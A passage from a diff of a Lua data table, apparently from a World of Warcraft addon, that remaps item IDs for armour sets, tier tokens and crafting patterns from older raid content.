Pauldrons of the Vanquished Champion }, - -- Conqueror's Gloves of Sanctification - ["46188"] = { - 45641, -- Gauntlets of the Wayward Conqueror + -- Rift Stalker Hauberk + ["30139"] = { + 30238, -- Chestguard of the Vanquished Hero }, - -- Conqueror's Nightsong Gloves - ["46189"] = { - 45643, -- Gauntlets of the Wayward Vanquisher + -- Rift Stalker Gauntlets + ["30140"] = { + 30241, -- Gloves of the Vanquished Hero }, - -- Conqueror's Shoulderpads of Sanctification - ["46190"] = { - 45656, -- Mantle of the Wayward Conqueror + -- Rift Stalker Helm + ["30141"] = { + 30244, -- Helm of the Vanquished Hero }, - -- Conqueror's Nightsong Cover - ["46191"] = { - 45640, -- Crown of the Wayward Vanquisher + -- Rift Stalker Leggings + ["30142"] = { + 30247, -- Leggings of the Vanquished Hero }, - -- Conqueror's Nightsong Trousers - ["46192"] = { - 45655, -- Legplates of the Wayward Vanquisher + -- Rift Stalker Mantle + ["30143"] = { + 30250, -- Pauldrons of the Vanquished Hero }, - -- Conqueror's Robe of Sanctification - ["46193"] = { - 45632, -- Breastplate of the Wayward Conqueror + -- Deathmantle Chestguard + ["30144"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Conqueror's Nightsong Vestments - ["46194"] = { - 45634, -- Breastplate of the Wayward Vanquisher + -- Deathmantle Handguards + ["30145"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Conqueror's Leggings of Sanctification - ["46195"] = { - 45653, -- Legplates of the Wayward Conqueror + -- Deathmantle Helm + ["30146"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Conqueror's Nightsong Mantle - ["46196"] = { - 45658, -- Mantle of the Wayward Vanquisher + -- Deathmantle Legguards + ["30148"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Conqueror's Cowl of Sanctification - ["46197"] = { - 45638, -- Crown of the Wayward Conqueror + -- Deathmantle Shoulderpads + ["30149"] = { + 30248, -- Pauldrons of the Vanquished Champion }, - -- Conqueror's Worldbreaker Tunic - ["46198"] = { - 45633, -- Breastplate of the Wayward Protector + -- Vestments of the Avatar + ["30150"] = { + 30237, -- Chestguard of the Vanquished Defender }, - -- Conqueror's Worldbreaker Handguards - ["46199"] = { - 45642, -- Gauntlets of the Wayward Protector + -- Gloves of the Avatar + ["30151"] = { + 30240, -- Gloves of the Vanquished Defender }, - -- Conqueror's Worldbreaker Grips - ["46200"] = { - 45642, -- Gauntlets of the Wayward Protector + -- Cowl of the Avatar + ["30152"] = { + 30243, -- Helm of the Vanquished Defender }, - -- Conqueror's Worldbreaker Headpiece - ["46201"] = { - 45639, -- Crown of the Wayward Protector + -- Breeches of the Avatar + ["30153"] = { + 30246, -- Leggings of the Vanquished Defender }, - -- Conqueror's Worldbreaker Legguards - ["46202"] = { - 45654, -- Legplates of the Wayward Protector + -- Mantle of the Avatar + ["30154"] = { + 30249, -- Pauldrons of the Vanquished Defender }, - -- Conqueror's Worldbreaker Shoulderguards - ["46203"] = { - 45657, -- Mantle of the Wayward Protector + -- Shroud of the Avatar + ["30159"] = { + 30237, -- Chestguard of the Vanquished Defender }, - -- Conqueror's Worldbreaker Spaulders - ["46204"] = { - 45657, -- Mantle of the Wayward Protector + -- Handguards of the Avatar + ["30160"] = { + 30240, -- Gloves of the Vanquished Defender }, - -- Conqueror's Worldbreaker Chestguard - ["46205"] = { - 45633, -- Breastplate of the Wayward Protector + -- Hood of the Avatar + ["30161"] = { + 30243, -- Helm of the Vanquished Defender }, - -- Conqueror's Worldbreaker Hauberk - ["46206"] = { - 45633, -- Breastplate of the Wayward Protector + -- Leggings of the Avatar + ["30162"] = { + 30246, -- Leggings of the Vanquished Defender }, - -- Conqueror's Worldbreaker Gloves - ["46207"] = { - 45642, -- Gauntlets of the Wayward Protector + -- Wings of the Avatar + ["30163"] = { + 30249, -- Pauldrons of the Vanquished Defender }, - -- Conqueror's Worldbreaker War-Kilt - ["46208"] = { - 45654, -- Legplates of the Wayward Protector + -- Cataclysm Chestguard + ["30164"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Conqueror's Worldbreaker Helm - ["46209"] = { - 45639, -- Crown of the Wayward Protector + -- Cataclysm Gloves + ["30165"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Conqueror's Worldbreaker Kilt - ["46210"] = { - 45654, -- Legplates of the Wayward Protector + -- Cataclysm Headguard + ["30166"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Conqueror's Worldbreaker Shoulderpads - ["46211"] = { - 45657, -- Mantle of the Wayward Protector + -- Cataclysm Legguards + ["30167"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Conqueror's Worldbreaker Faceguard - ["46212"] = { - 45639, -- Crown of the Wayward Protector + -- Cataclysm Shoulderguards + ["30168"] = { + 30248, -- Pauldrons of the Vanquished Champion }, - -- Valorous Nightsong Cover - ["46313"] = { - 45649, -- Helm of the Wayward Vanquisher + -- Cataclysm Chestpiece + ["30169"] = { + 30236, -- Chestguard of the Vanquished Champion }, - -- Drape of the Skyherald - ["46320"] = { - 46052, -- Reply-Code Alpha + -- Cataclysm Handgrips + ["30170"] = { + 30239, -- Gloves of the Vanquished Champion }, - -- Sunglimmer Drape - ["46321"] = { - 46052, -- Reply-Code Alpha + -- Cataclysm Headpiece + ["30171"] = { + 30242, -- Helm of the Vanquished Champion }, - -- Brann's Sealing Ring - ["46322"] = { - 46052, -- Reply-Code Alpha + -- Cataclysm Leggings + ["30172"] = { + 30245, -- Leggings of the Vanquished Champion }, - -- Starshine Signet - ["46323"] = { - 46052, -- Reply-Code Alpha + -- Cataclysm Shoulderpads + ["30173"] = { + 30248, -- Pauldrons of the Vanquished Champion }, - -- Trophy of the Crusade - ["47242"] = { - 47753, -- Khadgar's Gauntlets of Triumph - 47754, -- Khadgar's Hood of Triumph - 47755, -- Khadgar's Leggings of Triumph - 47756, -- Khadgar's Robe of Triumph - 47757, -- Khadgar's Shoulderpads of Triumph - 47768, -- Sunstrider's Shoulderpads of Triumph - 47769, -- Sunstrider's Robe of Triumph - 47770, -- Sunstrider's Leggings of Triumph - 47771, -- Sunstrider's Hood of Triumph - 47772, -- Sunstrider's Gauntlets of Triumph - 47778, -- Kel'Thuzad's Hood of Triumph - 47779, -- Kel'Thuzad's Robe of Triumph - 47780, -- Kel'Thuzad's Leggings of Triumph - 47781, -- Kel'Thuzad's Shoulderpads of Triumph - 47782, -- Kel'Thuzad's Gloves of Triumph - 47803, -- Gul'dan's Gloves of Triumph - 47804, -- Gul'dan's Hood of Triumph - 47805, -- Gul'dan's Leggings of Triumph - 47806, -- Gul'dan's Robe of Triumph - 47807, -- Gul'dan's Shoulderpads of Triumph - 47983, -- Velen's Gloves of Triumph - 47984, -- Velen's Cowl of Triumph - 47985, -- Velen's Leggings of Triumph - 47986, -- Velen's Robe of Triumph - 47987, -- Velen's Shoulderpads of Triumph - 48062, -- Zabra's Shoulderpads of Triumph + -- Cataclysm Chestplate + ["30185"] = { + 30236, -- Chestguard of the Vanquished Champion + }, + -- Cataclysm Gauntlets + ["30189"] = { + 30239, -- Gloves of the Vanquished Champion + }, + -- Cataclysm Helm + ["30190"] = { + 30242, -- Helm of the Vanquished Champion + }, + -- Cataclysm Legplates + ["30192"] = { + 30245, -- Leggings of the Vanquished Champion + }, + -- Cataclysm Shoulderplates + ["30194"] = { + 30248, -- Pauldrons of the Vanquished Champion + }, + -- Robes of Tirisfal + ["30196"] = { + 30238, -- Chestguard of the Vanquished Hero + }, + -- Gloves of Tirisfal + ["30205"] = { + 30241, -- Gloves of the Vanquished Hero + }, + -- Cowl of Tirisfal + ["30206"] = { + 30244, -- Helm of the Vanquished Hero + }, + -- Leggings of Tirisfal + ["30207"] = { + 30247, -- Leggings of the Vanquished Hero + }, + -- Mantle of Tirisfal + ["30210"] = { + 30250, -- Pauldrons of the Vanquished Hero + }, + -- Gloves of the Corruptor + ["30211"] = { + 30241, -- Gloves of the Vanquished Hero + }, + -- Hood of the Corruptor + ["30212"] = { + 30244, -- Helm of the Vanquished Hero + }, + -- Leggings of the Corruptor + ["30213"] = { + 30247, -- Leggings of the Vanquished Hero + }, + -- Robe of the Corruptor + ["30214"] = { + 30238, -- Chestguard of the Vanquished Hero + }, + -- Mantle of the Corruptor + ["30215"] = { + 30250, -- Pauldrons of the Vanquished Hero + }, + -- Nordrassil Chestguard + ["30216"] = { + 30237, -- Chestguard of the Vanquished Defender + }, + -- Nordrassil Gloves + ["30217"] = { + 30240, -- Gloves of the Vanquished Defender + }, + -- Nordrassil Headguard + ["30219"] = { + 30243, -- Helm of the Vanquished Defender + }, + -- Nordrassil Life-Kilt + ["30220"] = { + 30246, -- Leggings of the Vanquished Defender + }, + -- Nordrassil Life-Mantle + ["30221"] = { + 30249, -- Pauldrons of the Vanquished Defender + }, + -- Nordrassil Chestplate + ["30222"] = { + 30237, -- Chestguard of the Vanquished Defender + }, + -- Nordrassil Handgrips + ["30223"] = { + 30240, -- Gloves of the Vanquished Defender + }, + -- Nordrassil Headdress + ["30228"] = { + 30243, -- Helm of the Vanquished Defender + }, + -- Nordrassil Feral-Kilt + ["30229"] = { + 30246, -- Leggings of the Vanquished Defender + }, + -- Nordrassil Feral-Mantle + ["30230"] = { + 30249, -- Pauldrons of the Vanquished Defender + }, + -- Nordrassil Chestpiece + ["30231"] = { + 30237, -- Chestguard of the Vanquished Defender + }, + -- Nordrassil Gauntlets + ["30232"] = { + 30240, -- Gloves of the Vanquished Defender + }, + -- Nordrassil Headpiece + ["30233"] = { + 30243, -- Helm of the Vanquished Defender + }, + -- Nordrassil Wrath-Kilt + ["30234"] = { + 30246, -- Leggings of the Vanquished Defender + }, + -- Nordrassil Wrath-Mantle + ["30235"] = { + 30249, -- Pauldrons of the Vanquished Defender + }, + -- Chestguard of the Vanquished Champion + ["30236"] = { + 30123, -- Crystalforge Chestguard + 30129, -- Crystalforge Breastplate + 30134, -- Crystalforge Chestpiece + 30144, -- Deathmantle Chestguard + 30164, -- Cataclysm Chestguard + 30169, -- Cataclysm Chestpiece + 30185, -- Cataclysm Chestplate + }, + -- Chestguard of the Vanquished Defender + ["30237"] = { + 30113, -- Destroyer Chestguard + 30118, -- Destroyer Breastplate + 30150, -- Vestments of the Avatar + 30159, -- Shroud of the Avatar + 30216, -- Nordrassil Chestguard + 30222, -- Nordrassil Chestplate + 30231, -- Nordrassil Chestpiece + }, + -- Chestguard of the Vanquished Hero + ["30238"] = { + 30139, -- Rift Stalker Hauberk + 30196, -- Robes of Tirisfal + 30214, -- Robe of the Corruptor + }, + -- Gloves of the Vanquished Champion + ["30239"] = { + 30124, -- Crystalforge Handguards + 30130, -- Crystalforge Gauntlets + 30135, -- Crystalforge Gloves + 30145, -- Deathmantle Handguards + 30165, -- Cataclysm Gloves + 30170, -- Cataclysm Handgrips + 30189, -- Cataclysm Gauntlets + }, + -- Gloves of the Vanquished Defender + ["30240"] = { + 30114, -- Destroyer Handguards + 30119, -- Destroyer Gauntlets + 30151, -- Gloves of the Avatar + 30160, -- Handguards of the Avatar + 30217, -- Nordrassil Gloves + 30223, -- Nordrassil Handgrips + 30232, -- Nordrassil Gauntlets + }, + -- Gloves of the Vanquished Hero + ["30241"] = { + 30140, -- Rift Stalker Gauntlets + 30205, -- Gloves of Tirisfal + 30211, -- Gloves of the Corruptor + }, + -- Helm of the Vanquished Champion + ["30242"] = { + 30125, -- Crystalforge Faceguard + 30131, -- Crystalforge War-Helm + 30136, -- Crystalforge Greathelm + 30146, -- Deathmantle Helm + 30166, -- Cataclysm Headguard + 30171, -- Cataclysm Headpiece + 30190, -- Cataclysm Helm + }, + -- Helm of the Vanquished Defender + ["30243"] = { + 30115, -- Destroyer Greathelm + 30120, -- Destroyer Battle-Helm + 30152, -- Cowl of the Avatar + 30161, -- Hood of the Avatar + 30219, -- Nordrassil Headguard + 30228, -- Nordrassil Headdress + 30233, -- Nordrassil Headpiece + }, + -- Helm of the Vanquished Hero + ["30244"] = { + 30141, -- Rift Stalker Helm + 30206, -- Cowl of Tirisfal + 30212, -- Hood of the Corruptor + }, + -- Leggings of the Vanquished Champion + ["30245"] = { + 30126, -- Crystalforge Legguards + 30132, -- Crystalforge Greaves + 30137, -- Crystalforge Leggings + 30148, -- Deathmantle Legguards + 30167, -- Cataclysm Legguards + 30172, -- Cataclysm Leggings + 30192, -- Cataclysm Legplates + }, + -- Leggings of the Vanquished Defender + ["30246"] = { + 30116, -- Destroyer Legguards + 30121, -- Destroyer Greaves + 30153, -- Breeches of the Avatar + 30162, -- Leggings of the Avatar + 30220, -- Nordrassil Life-Kilt + 30229, -- Nordrassil Feral-Kilt + 30234, -- Nordrassil Wrath-Kilt + }, + -- Leggings of the Vanquished Hero + ["30247"] = { + 30142, -- Rift Stalker Leggings + 30207, -- Leggings of Tirisfal + 30213, -- Leggings of the Corruptor + }, + -- Pauldrons of the Vanquished Champion + ["30248"] = { + 30127, -- Crystalforge Shoulderguards + 30133, -- Crystalforge Shoulderbraces + 30138, -- Crystalforge Pauldrons + 30149, -- Deathmantle Shoulderpads + 30168, -- Cataclysm Shoulderguards + 30173, -- Cataclysm Shoulderpads + 30194, -- Cataclysm Shoulderplates + }, + -- Pauldrons of the Vanquished Defender + ["30249"] = { + 30117, -- Destroyer Shoulderguards + 30122, -- Destroyer Shoulderblades + 30154, -- Mantle of the Avatar + 30163, -- Wings of the Avatar + 30221, -- Nordrassil Life-Mantle + 30230, -- Nordrassil Feral-Mantle + 30235, -- Nordrassil Wrath-Mantle + }, + -- Pauldrons of the Vanquished Hero + ["30250"] = { + 30143, -- Rift Stalker Mantle + 30210, -- Mantle of Tirisfal + 30215, -- Mantle of the Corruptor + }, + -- Pattern: Belt of Blasting + ["30280"] = { + 30038, -- Belt of Blasting + }, + -- Pattern: Belt of the Long Road + ["30281"] = { + 30036, -- Belt of the Long Road + }, + -- Pattern: Boots of Blasting + ["30282"] = { + 30037, -- Boots of Blasting + }, + -- Pattern: Boots of the Long Road + ["30283"] = { + 30035, -- Boots of the Long Road + }, + -- Pattern: Belt of Natural Power + ["30301"] = { + 30042, -- Belt of Natural Power + }, + -- Pattern: Belt of Deep Shadow + ["30302"] = { + 30040, -- Belt of Deep Shadow + }, + -- Pattern: Belt of the Black Eagle + ["30303"] = { + 30046, -- Belt of the Black Eagle + }, + -- Pattern: Monsoon Belt + ["30304"] = { + 30044, -- Monsoon Belt + }, + -- Pattern: Boots of Natural Grace + ["30305"] = { + 30041, -- Boots of Natural Grace + }, + -- Pattern: Boots of Utter Darkness + ["30306"] = { + 30039, -- Boots of Utter Darkness + }, + -- Pattern: Boots of the Crimson Hawk + ["30307"] = { + 30045, -- Boots of the Crimson Hawk + }, + -- Pattern: Hurricane Boots + ["30308"] = { + 30043, -- Hurricane Boots + }, + -- Plans: Belt of the Guardian + ["30321"] = { + 30034, -- Belt of the Guardian + }, + -- Plans: Red Belt of Battle + ["30322"] = { + 30032, -- Red Belt of Battle + }, + -- Plans: Boots of the Protector + ["30323"] = { + 30033, -- Boots of the Protector + }, + -- Plans: Red Havoc Boots + ["30324"] = { + 30031, -- Red Havoc Boots + }, + -- Onslaught Gauntlets + ["30969"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Onslaught Handguards + ["30970"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Onslaught Battle-Helm + ["30972"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Onslaught Greathelm + ["30974"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Onslaught Breastplate + ["30975"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Onslaught Chestguard + ["30976"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Onslaught Greaves + ["30977"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Onslaught Legguards + ["30978"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Onslaught Shoulderblades + ["30979"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Onslaught Shoulderguards + ["30980"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Lightbringer Gauntlets + ["30982"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Lightbringer Gloves + ["30983"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Lightbringer Handguards + ["30985"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Lightbringer Faceguard + ["30987"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Lightbringer Greathelm + ["30988"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Lightbringer War-Helm + ["30989"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Lightbringer Breastplate + ["30990"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Lightbringer Chestguard + ["30991"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Lightbringer Chestpiece + ["30992"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Lightbringer Greaves + ["30993"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Lightbringer Leggings + ["30994"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Lightbringer Legguards + ["30995"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Lightbringer Pauldrons + ["30996"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Lightbringer Shoulderbraces + ["30997"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Lightbringer Shoulderguards + ["30998"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Gronnstalker's Gloves + ["31001"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Gronnstalker's Helmet + ["31003"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Gronnstalker's Chestguard + ["31004"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Gronnstalker's Leggings + ["31005"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Gronnstalker's Spaulders + ["31006"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Skyshatter Gloves + ["31007"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Skyshatter Gauntlets + ["31008"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Skyshatter Grips + ["31011"] = { + 31094, -- Gloves of the Forgotten Protector + }, + -- Skyshatter Helmet + ["31012"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Skyshatter Headguard + ["31014"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Skyshatter Cover + ["31015"] = { + 31095, -- Helm of the Forgotten Protector + }, + -- Skyshatter Chestguard + ["31016"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Skyshatter Breastplate + ["31017"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Skyshatter Tunic + ["31018"] = { + 31091, -- Chestguard of the Forgotten Protector + }, + -- Skyshatter Leggings + ["31019"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Skyshatter Legguards + ["31020"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Skyshatter Pants + ["31021"] = { + 31100, -- Leggings of the Forgotten Protector + }, + -- Skyshatter Shoulderpads + ["31022"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Skyshatter Mantle + ["31023"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Skyshatter Pauldrons + ["31024"] = { + 31103, -- Pauldrons of the Forgotten Protector + }, + -- Slayer's Handguards + ["31026"] = { + 31093, -- Gloves of the Forgotten Vanquisher + }, + -- Slayer's Helm + ["31027"] = { + 31096, -- Helm of the Forgotten Vanquisher + }, + -- Slayer's Chestguard + ["31028"] = { + 31090, -- Chestguard of the Forgotten Vanquisher + }, + -- Slayer's Legguards + ["31029"] = { + 31099, -- Leggings of the Forgotten Vanquisher + }, + -- Slayer's Shoulderpads + ["31030"] = { + 31102, -- Pauldrons of the Forgotten Vanquisher + }, + -- Thunderheart Gloves + ["31032"] = { + 31093, -- Gloves of the Forgotten Vanquisher + }, + -- Thunderheart Gauntlets + ["31034"] = { + 31093, -- Gloves of the Forgotten Vanquisher + }, + -- Thunderheart Handguards + ["31035"] = { + 31093, -- Gloves of the Forgotten Vanquisher + }, + -- Thunderheart Helmet + ["31037"] = { + 31096, -- Helm of the Forgotten Vanquisher + }, + -- Thunderheart Cover + ["31039"] = { + 31096, -- Helm of the Forgotten Vanquisher + }, + -- Thunderheart Headguard + ["31040"] = { + 31096, -- Helm of the Forgotten Vanquisher + }, + -- Thunderheart Tunic + ["31041"] = { + 31090, -- Chestguard of the Forgotten Vanquisher + }, + -- Thunderheart Chestguard + ["31042"] = { + 31090, -- Chestguard of the Forgotten Vanquisher + }, + -- Thunderheart Vest + ["31043"] = { + 31090, -- Chestguard of the Forgotten Vanquisher + }, + -- Thunderheart Leggings + ["31044"] = { + 31099, -- Leggings of the Forgotten Vanquisher + }, + -- Thunderheart Legguards + ["31045"] = { + 31099, -- Leggings of the Forgotten Vanquisher + }, + -- Thunderheart Pants + ["31046"] = { + 31099, -- Leggings of the Forgotten Vanquisher + }, + -- Thunderheart Spaulders + ["31047"] = { + 31102, -- Pauldrons of the Forgotten Vanquisher + }, + -- Thunderheart Pauldrons + ["31048"] = { + 31102, -- Pauldrons of the Forgotten Vanquisher + }, + -- Thunderheart Shoulderpads + ["31049"] = { + 31102, -- Pauldrons of the Forgotten Vanquisher + }, + -- Gloves of the Malefic + ["31050"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Hood of the Malefic + ["31051"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Robe of the Malefic + ["31052"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Leggings of the Malefic + ["31053"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Mantle of the Malefic + ["31054"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Gloves of the Tempest + ["31055"] = { + 31093, -- Gloves of the Forgotten Vanquisher + }, + -- Cowl of the Tempest + ["31056"] = { + 31096, -- Helm of the Forgotten Vanquisher + }, + -- Robes of the Tempest + ["31057"] = { + 31090, -- Chestguard of the Forgotten Vanquisher + }, + -- Leggings of the Tempest + ["31058"] = { + 31099, -- Leggings of the Forgotten Vanquisher + }, + -- Mantle of the Tempest + ["31059"] = { + 31102, -- Pauldrons of the Forgotten Vanquisher + }, + -- Gloves of Absolution + ["31060"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Handguards of Absolution + ["31061"] = { + 31092, -- Gloves of the Forgotten Conqueror + }, + -- Cowl of Absolution + ["31063"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Hood of Absolution + ["31064"] = { + 31097, -- Helm of the Forgotten Conqueror + }, + -- Shroud of Absolution + ["31065"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Vestments of Absolution + ["31066"] = { + 31089, -- Chestguard of the Forgotten Conqueror + }, + -- Leggings of Absolution + ["31067"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Breeches of Absolution + ["31068"] = { + 31098, -- Leggings of the Forgotten Conqueror + }, + -- Mantle of Absolution + ["31069"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Shoulderpads of Absolution + ["31070"] = { + 31101, -- Pauldrons of the Forgotten Conqueror + }, + -- Chestguard of the Forgotten Conqueror + ["31089"] = { + 30990, -- Lightbringer Breastplate + 30991, -- Lightbringer Chestguard + 30992, -- Lightbringer Chestpiece + 31052, -- Robe of the Malefic + 31065, -- Shroud of Absolution + 31066, -- Vestments of Absolution + }, + -- Chestguard of the Forgotten Vanquisher + ["31090"] = { + 31028, -- Slayer's Chestguard + 31041, -- Thunderheart Tunic + 31042, -- Thunderheart Chestguard + 31043, -- Thunderheart Vest + 31057, -- Robes of the Tempest + }, + -- Chestguard of the Forgotten Protector + ["31091"] = { + 30975, -- Onslaught Breastplate + 30976, -- Onslaught Chestguard + 31004, -- Gronnstalker's Chestguard + 31016, -- Skyshatter Chestguard + 31017, -- Skyshatter Breastplate + 31018, -- Skyshatter Tunic + }, + -- Gloves of the Forgotten Conqueror + ["31092"] = { + 30982, -- Lightbringer Gauntlets + 30983, -- Lightbringer Gloves + 30985, -- Lightbringer Handguards + 31050, -- Gloves of the Malefic + 31060, -- Gloves of Absolution + 31061, -- Handguards of Absolution + }, + -- Gloves of the Forgotten Vanquisher + ["31093"] = { + 31026, -- Slayer's Handguards + 31032, -- Thunderheart Gloves + 31034, -- Thunderheart Gauntlets + 31035, -- Thunderheart Handguards + 31055, -- Gloves of the Tempest + }, + -- Gloves of the Forgotten Protector + ["31094"] = { + 30969, -- Onslaught Gauntlets + 30970, -- Onslaught Handguards + 31001, -- Gronnstalker's Gloves + 31007, -- Skyshatter Gloves + 31008, -- Skyshatter Gauntlets + 31011, -- Skyshatter Grips + }, + -- Helm of the Forgotten Protector + ["31095"] = { + 30972, -- Onslaught Battle-Helm + 30974, -- Onslaught Greathelm + 31003, -- Gronnstalker's Helmet + 31012, -- Skyshatter Helmet + 31014, -- Skyshatter Headguard + 31015, -- Skyshatter Cover + }, + -- Helm of the Forgotten Vanquisher + ["31096"] = { + 31027, -- Slayer's Helm + 31037, -- Thunderheart Helmet + 31039, -- Thunderheart Cover + 31040, -- Thunderheart Headguard + 31056, -- Cowl of the Tempest + }, + -- Helm of the Forgotten Conqueror + ["31097"] = { + 30987, -- Lightbringer Faceguard + 30988, -- Lightbringer Greathelm + 30989, -- Lightbringer War-Helm + 31051, -- Hood of the Malefic + 31063, -- Cowl of Absolution + 31064, -- Hood of Absolution + }, + -- Leggings of the Forgotten Conqueror + ["31098"] = { + 30993, -- Lightbringer Greaves + 30994, -- Lightbringer Leggings + 30995, -- Lightbringer Legguards + 31053, -- Leggings of the Malefic + 31067, -- Leggings of Absolution + 31068, -- Breeches of Absolution + }, + -- Leggings of the Forgotten Vanquisher + ["31099"] = { + 31029, -- Slayer's Legguards + 31044, -- Thunderheart Leggings + 31045, -- Thunderheart Legguards + 31046, -- Thunderheart Pants + 31058, -- Leggings of the Tempest + }, + -- Leggings of the Forgotten Protector + ["31100"] = { + 30977, -- Onslaught Greaves + 30978, -- Onslaught Legguards + 31005, -- Gronnstalker's Leggings + 31019, -- Skyshatter Leggings + 31020, -- Skyshatter Legguards + 31021, -- Skyshatter Pants + }, + -- Pauldrons of the Forgotten Conqueror + ["31101"] = { + 30996, -- Lightbringer Pauldrons + 30997, -- Lightbringer Shoulderbraces + 30998, -- Lightbringer Shoulderguards + 31054, -- Mantle of the Malefic + 31069, -- Mantle of Absolution + 31070, -- Shoulderpads of Absolution + }, + -- Pauldrons of the Forgotten Vanquisher + ["31102"] = { + 31030, -- Slayer's Shoulderpads + 31047, -- Thunderheart Spaulders + 31048, -- Thunderheart Pauldrons + 31049, -- Thunderheart Shoulderpads + 31059, -- Mantle of the Tempest + }, + -- Pauldrons of the Forgotten Protector + ["31103"] = { + 30979, -- Onslaught Shoulderblades + 30980, -- Onslaught Shoulderguards + 31006, -- Gronnstalker's Spaulders + 31022, -- Skyshatter Shoulderpads + 31023, -- Skyshatter Mantle + 31024, -- Skyshatter Pauldrons + }, + -- Magtheridon's Head (Alliance) + ["32385"] = { + 28790, -- Naaru Lightwarden's Band + 28791, -- Ring of the Recalcitrant + 28792, -- A'dal's Signet of Defense + 28793, -- Band of Crimson Fury + 32386, -- Magtheridon's Head (Horde) + }, + -- Magtheridon's Head (Horde) + ["32386"] = { + 28790, -- Naaru Lightwarden's Band + 28791, -- Ring of the Recalcitrant + 28792, -- A'dal's Signet of Defense + 28793, -- Band of Crimson Fury + 32385, -- Magtheridon's Head (Alliance) + }, + -- Verdant Sphere + ["32405"] = { + 30007, -- The Darkener's Grasp + 30015, -- The Sun King's Talisman + 30017, -- Telonicus's Pendant of Mayhem + 30018, -- Lord Sanguinar's Claim + }, + -- Swiftsteel Bracers + ["32568"] = { + 32736, -- Plans: Swiftsteel Bracers + }, + -- Swiftsteel Shoulders + ["32570"] = { + 32737, -- Plans: Swiftsteel Shoulders + }, + -- Dawnsteel Bracers + ["32571"] = { + 32738, -- Plans: Dawnsteel Bracers + }, + -- Dawnsteel Shoulders + ["32573"] = { + 32739, -- Plans: Dawnsteel Shoulders + }, + -- Bindings of Lightning Reflexes + ["32574"] = { + 32748, -- Pattern: Bindings of Lightning Reflexes + }, + -- Shoulders of Lightning Reflexes + ["32575"] = { + 32749, -- Pattern: Shoulders of Lightning Reflexes + }, + -- Living Earth Bindings + ["32577"] = { + 32750, -- Pattern: Living Earth Bindings + }, + -- Living Earth Shoulders + ["32579"] = { + 32751, -- Pattern: Living Earth Shoulders + }, + -- Swiftstrike Bracers + ["32580"] = { + 32746, -- Pattern: Swiftstrike Bracers + }, + -- Swiftstrike Shoulders + ["32581"] = { + 32747, -- Pattern: Swiftstrike Shoulders + }, + -- Bracers of Renewed Life + ["32582"] = { + 32744, -- Pattern: Bracers of Renewed Life + }, + -- Shoulderpads of Renewed Life + ["32583"] = { + 32745, -- Pattern: Shoulderpads of Renewed Life + }, + -- Swiftheal Wraps + ["32584"] = { + 32752, -- Pattern: Swiftheal Wraps + }, + -- Swiftheal Mantle + ["32585"] = { + 32753, -- Pattern: Swiftheal Mantle + }, + -- Bracers of Nimble Thought + ["32586"] = { + 32754, -- Pattern: Bracers of Nimble Thought + }, + -- Mantle of Nimble Thought + ["32587"] = { + 32755, -- Pattern: Mantle of Nimble Thought + }, + -- Plans: Swiftsteel Bracers + ["32736"] = { + 32568, -- Swiftsteel Bracers + }, + -- Plans: Swiftsteel Shoulders + ["32737"] = { + 32570, -- Swiftsteel Shoulders + }, + -- Plans: Dawnsteel Bracers + ["32738"] = { + 32571, -- Dawnsteel Bracers + }, + -- Plans: Dawnsteel Shoulders + ["32739"] = { 